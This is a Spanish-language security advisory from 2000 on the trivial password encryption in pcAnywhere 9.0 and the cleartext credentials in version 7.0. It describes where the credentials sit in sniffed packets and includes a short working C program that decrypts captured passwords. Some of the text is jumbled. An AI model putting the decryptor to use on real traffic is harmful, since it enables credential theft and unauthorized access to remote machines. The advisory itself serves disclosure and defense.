2000
Abr
19
19/04/2000 El cifrado de pcAnywhere es inseguro
La última versión de pcAnyware 9.0 cifra los nombres de usuarios y
contraseñas de forma trivial, por lo que cualquier atacante con
acceso a las redes externas puede capturar esa información y
utilizarla para acceder a las máquinas remotas.
pcAnyware es un software para uso y administración remota de máquinas
MS Windows, por lo que este problema es especialmente importante, ya
que las máquinas remotas suelen encontrarse en redes hostiles.
aunque se considera extremadamente probable. La versión 7.0 envía
los nombres de usuario y contraseñas directamente en texto claro,
a disposición de cualquier atacante con un sniffer.El nombre de usuario y la contraseña están contenidas en una cadena
dos paquetes después de "Enter your login name" y "enter your
password". Están precedidas por el byte 0x06, y el siguiente número
es la longitud de la misma.A continuación se incluye un programa en C que puede utilizarse para
descifrar una clave capturada con cualquier sniffer.
#include <stdio.h>Más información:Symantec pcAnywhere Weak Encryption Vulnerability
#include <string.h>void main() { char password[128];
char cleartext[128];
int i; // input the sniffed hex values here
// Encrypted example of the 'aaaaa' password
password[0]=0xca;
password[1]=0xab;
password[2]=0xcb;
password[3]=0xa8;
password[4]=0xca;
password[5]='\0';cleartext[0]=0xca-password[0]+0x61;
for (i=1;i<strlen(password);i++)
cleartext[i] = password[i-1] ^ password[i] ^ i-1;cleartext[strlen(password)]='\0';printf("password is %s \n",cleartext);}
http://www.securityfocus.com/vdb/bottom.html?vid=1093Common Questions About Symmetric or Public Key Encryption in pcAnywhere
http://service1.symantec.com/SUPPORT/pca.nsf/docid/1999022312571812&src=w
Jesús Cea Avión